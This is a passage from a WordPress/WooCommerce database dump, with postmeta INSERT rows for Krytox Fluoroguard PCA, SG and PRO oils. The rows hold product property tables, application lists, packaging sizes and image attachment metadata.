11:"shop_single";a:4:{s:4:"file";s:38:"krytox-fluoroguard-pca-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"8";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14862, 1428, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14863, 1428, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14864, 1428, '312_default_editor', '<table width="1113">\r\n<tbody>\r\n<tr>\r\n<td width="219">Typical Properties Fluoroguard™</td>\r\n<td width="224"></td>\r\n<td style="text-align: center;" width="263">PCA</td>\r\n<td style="text-align: center;" width="219">SG</td>\r\n<td style="text-align: center;" width="188">PRO</td>\r\n</tr>\r\n<tr>\r\n<td>Properties</td>\r\n<td style="text-align: center;">Units/Conditions</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n</tr>\r\n<tr>\r\n<td>Average Molecular Weight</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">4800</td>\r\n<td style="text-align: center;">4950</td>\r\n<td style="text-align: center;">1375</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">cSt at 122°F</td>\r\n<td style="text-align: center;">101</td>\r\n<td style="text-align: center;">107</td>\r\n<td style="text-align: center;">5</td>\r\n</tr>\r\n<tr>\r\n<td>Volatility</td>\r\n<td style="text-align: center;">22 hr at 250°F</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">g/mL at 74°F</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">dyn/cm at 79°F</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Refractive Index</td>\r\n<td style="text-align: center;">nD25</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point</td>\r\n<td style="text-align: center;">°F</td>\r\n<td style="text-align: center;">-33</td>\r\n<td style="text-align: center;">-36</td>\r\n<td style="text-align: center;"> -94</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td>Clear Liquid</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14865, 1428, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14866, 1428, '716_default_editor', '<ul>\r\n 	<li>Polymer gear/bushings</li>\r\n 	<li>Auto weather stripping and interiors</li>\r\n 	<li>Shoe soles and cleats</li>\r\n 	<li>O-rings/seals</li>\r\n 	<li>Polymer films</li>\r\n 	<li>Processing aids</li>\r\n 	<li>Cable liners</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14867, 1428, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14868, 1428, '318_custom_list_file', 'a:1:{s:32:"60905c728d74d31d6cfc27975085e7a0";a:3:{s:4:"name";s:19:"Fluoroguard PCA PDF";s:4:"file";s:68:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/PCA.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14869, 1428, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14870, 1428, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14871, 1428, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14872, 1428, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14873, 1428, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14874, 1428, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14875, 1428, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14876, 1428, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14877, 1428, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14878, 1428, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14879, 1428, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14880, 1428, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14881, 1428, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14882, 1428, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14883, 1428, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14884, 1428, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14885, 1428, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14886, 1428, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14887, 1428, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14888, 1428, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14889, 1428, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14890, 1428, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14891, 1428, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14892, 1428, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14893, 1428, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14894, 1428, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14895, 1428, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14896, 1428, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14897, 1428, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14898, 1428, '_product_image_gallery', '384'); 
INSERT INTO `wp_postmeta` VALUES (14899, 1428, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14900, 1431, '_edit_lock', '1487963533:2'); 
INSERT INTO `wp_postmeta` VALUES (14901, 1431, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14903, 1431, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14904, 1431, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14905, 1431, '312_default_editor', '<table width="1113">\r\n<tbody>\r\n<tr>\r\n<td width="219">Typical Properties Fluoroguard™</td>\r\n<td width="224"></td>\r\n<td style="text-align: center;" width="263">PCA</td>\r\n<td style="text-align: center;" width="219">SG</td>\r\n<td style="text-align: center;" width="188">PRO</td>\r\n</tr>\r\n<tr>\r\n<td>Properties</td>\r\n<td style="text-align: center;">Units/Conditions</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n</tr>\r\n<tr>\r\n<td>Average Molecular Weight</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">4800</td>\r\n<td style="text-align: center;">4950</td>\r\n<td style="text-align: center;">1375</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">cSt at 122°F</td>\r\n<td style="text-align: center;">101</td>\r\n<td style="text-align: center;">107</td>\r\n<td style="text-align: center;">5</td>\r\n</tr>\r\n<tr>\r\n<td>Volatility</td>\r\n<td style="text-align: center;">22 hr at 250°F</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">g/mL at 74°F</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">dyn/cm at 79°F</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Refractive Index</td>\r\n<td style="text-align: center;">nD25</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point</td>\r\n<td style="text-align: center;">°F</td>\r\n<td style="text-align: center;">-33</td>\r\n<td style="text-align: center;">-36</td>\r\n<td style="text-align: center;"> -94</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td>Clear Liquid</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14906, 1431, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14907, 1431, '716_default_editor', '<ul>\r\n 	<li>Polymer gear/bushings</li>\r\n 	<li>Auto weather stripping and interiors</li>\r\n 	<li>Shoe soles and cleats</li>\r\n 	<li>O-rings/seals</li>\r\n 	<li>Polymer films</li>\r\n 	<li>Processing aids</li>\r\n 	<li>Cable liners</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14908, 1431, '719_default_editor', '<ul>\r\n 	<li>USP Class VI</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14909, 1431, '318_custom_list_file', 'a:1:{s:32:"75b80426df546a650551da685c2f8eb9";a:3:{s:4:"name";s:21:"Fluoroguard™ SG PDF";s:4:"file";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/SG.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14910, 1431, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14911, 1431, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14912, 1431, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14913, 1431, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14914, 1431, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14915, 1431, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14916, 1431, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14917, 1431, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14918, 1431, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14919, 1431, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14920, 1431, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14921, 1431, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14922, 1431, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14923, 1431, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14924, 1431, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14925, 1431, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14926, 1431, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14927, 1431, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14928, 1431, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14929, 1431, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (14930, 1431, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14931, 1431, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14932, 1431, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (14933, 1431, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14934, 1431, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14935, 1431, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (14936, 1431, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (14937, 1431, '_product_image_gallery', '384'); 
INSERT INTO `wp_postmeta` VALUES (14963, 1432, '_wp_attached_file', '2016/09/SG.pdf'); 
INSERT INTO `wp_postmeta` VALUES (14964, 1433, '_wp_attached_file', '2016/09/krytox-sg-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14965, 1433, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4912;s:6:"height";i:3123;s:4:"file";s:25:"2016/09/krytox-sg-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"krytox-sg-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"krytox-sg-oil-800x509.jpg";s:5:"width";i:800;s:6:"height";i:509;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"krytox-sg-oil-768x488.jpg";s:5:"width";i:768;s:6:"height";i:488;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"krytox-sg-oil-1600x1017.jpg";s:5:"width";i:1600;s:6:"height";i:1017;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"krytox-sg-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"krytox-sg-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"krytox-sg-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"krytox-sg-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14966, 1431, '_thumbnail_id', '1433'); 
INSERT INTO `wp_postmeta` VALUES (14967, 1431, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (14968, 1431, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (14969, 1431, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (14970, 1434, '_wp_attached_file', '2016/09/krytox-pca-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (14971, 1434, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5760;s:6:"height";i:3840;s:4:"file";s:26:"2016/09/krytox-pca-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"krytox-pca-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"krytox-pca-oil-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"krytox-pca-oil-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"krytox-pca-oil-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"krytox-pca-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"krytox-pca-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"krytox-pca-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"krytox-pca-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (14972, 1428, '_thumbnail_id', '1969'); 
INSERT INTO `wp_postmeta` VALUES (14973, 1435, '_edit_lock', '1487963517:2'); 
INSERT INTO `wp_postmeta` VALUES (14974, 1435, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (14975, 1435, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (14976, 1435, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (14977, 1435, '312_default_editor', '<table width="1113">\r\n<tbody>\r\n<tr>\r\n<td width="219">Typical Properties Fluoroguard™</td>\r\n<td width="224"></td>\r\n<td style="text-align: center;" width="263">PCA</td>\r\n<td style="text-align: center;" width="219">SG</td>\r\n<td style="text-align: center;" width="188">PRO</td>\r\n</tr>\r\n<tr>\r\n<td>Properties</td>\r\n<td style="text-align: center;">Units/Conditions</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n<td style="text-align: center;">Typical Values</td>\r\n</tr>\r\n<tr>\r\n<td>Average Molecular Weight</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">4800</td>\r\n<td style="text-align: center;">4950</td>\r\n<td style="text-align: center;">1375</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity</td>\r\n<td style="text-align: center;">cSt at 122°F</td>\r\n<td style="text-align: center;">101</td>\r\n<td style="text-align: center;">107</td>\r\n<td style="text-align: center;">5</td>\r\n</tr>\r\n<tr>\r\n<td>Volatility</td>\r\n<td style="text-align: center;">22 hr at 250°F</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">&lt;1.0%</td>\r\n<td style="text-align: center;">-</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">g/mL at 74°F</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n<td style="text-align: center;">1.9</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">dyn/cm at 79°F</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">18</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Refractive Index</td>\r\n<td style="text-align: center;">nD25</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n<td style="text-align: center;">1.3</td>\r\n</tr>\r\n<tr>\r\n<td>Pour Point</td>\r\n<td style="text-align: center;">°F</td>\r\n<td style="text-align: center;">-33</td>\r\n<td style="text-align: center;">-36</td>\r\n<td style="text-align: center;"> -94</td>\r\n</tr>\r\n<tr>\r\n<td>Appearance</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td style="text-align: center;">Clear Liquid</td>\r\n<td>Clear Liquid</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14978, 1435, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (14979, 1435, '716_default_editor', '<ul>\r\n 	<li>Polymer gear/bushings</li>\r\n 	<li>Auto weather stripping and interiors</li>\r\n 	<li>Shoe soles and cleats</li>\r\n 	<li>O-rings/seals</li>\r\n 	<li>Polymer films</li>\r\n 	<li>Processing aids</li>\r\n 	<li>Cable liners</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14980, 1435, '719_default_editor', '<ul>\r\n 	<li>USP Class VI</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (14981, 1435, '318_custom_list_file', 'a:1:{s:32:"331f3f582a4ba54d3c52a299411290b9";a:3:{s:4:"name";s:21:"Fluoroguard™ SG PDF";s:4:"file";s:67:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/SG.pdf";s:4:"desc";s:20:"Technical Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (14982, 1435, '317_default_editor', '<table class=" aligncenter">\r\n<tbody>\r\n<tr>\r\n<td width="104"><strong>Syringe</strong></td>\r\n<td width="104"><strong>Dab-O-Matic</strong></td>\r\n<td width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td width="104"><strong>Jar</strong></td>\r\n<td width="104"><strong>Bottle</strong></td>\r\n<td width="104"><strong>Jug</strong></td>\r\n</tr>\r\n<tr>\r\n<td width="104">.5 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">1 oz.</td>\r\n<td width="104">.5 kg</td>\r\n<td width="104">1 kg</td>\r\n<td width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">1 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104">2 oz.</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104">20 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">2 oz.</td>\r\n<td width="104">-</td>\r\n<td width="104">-</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td width="104">-</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (14983, 1435, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (14984, 1435, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14985, 1435, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14986, 1435, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (14987, 1435, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (14988, 1435, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (14989, 1435, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (14990, 1435, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (14991, 1435, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (14992, 1435, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (14993, 1435, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14994, 1435, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14995, 1435, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (14996, 1435, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (14997, 1435, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (14998, 1435, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (14999, 1435, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15000, 1435, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15001, 1435, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (15002, 1435, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15003, 1435, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (15004, 1435, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (15005, 1435, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15006, 1435, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (15007, 1435, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (15008, 1435, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (15009, 1435, '_product_image_gallery', '384'); 
INSERT INTO `wp_postmeta` VALUES (15036, 1436, '_wp_attached_file', '2016/09/krytox-pro-oil.jpg'); 
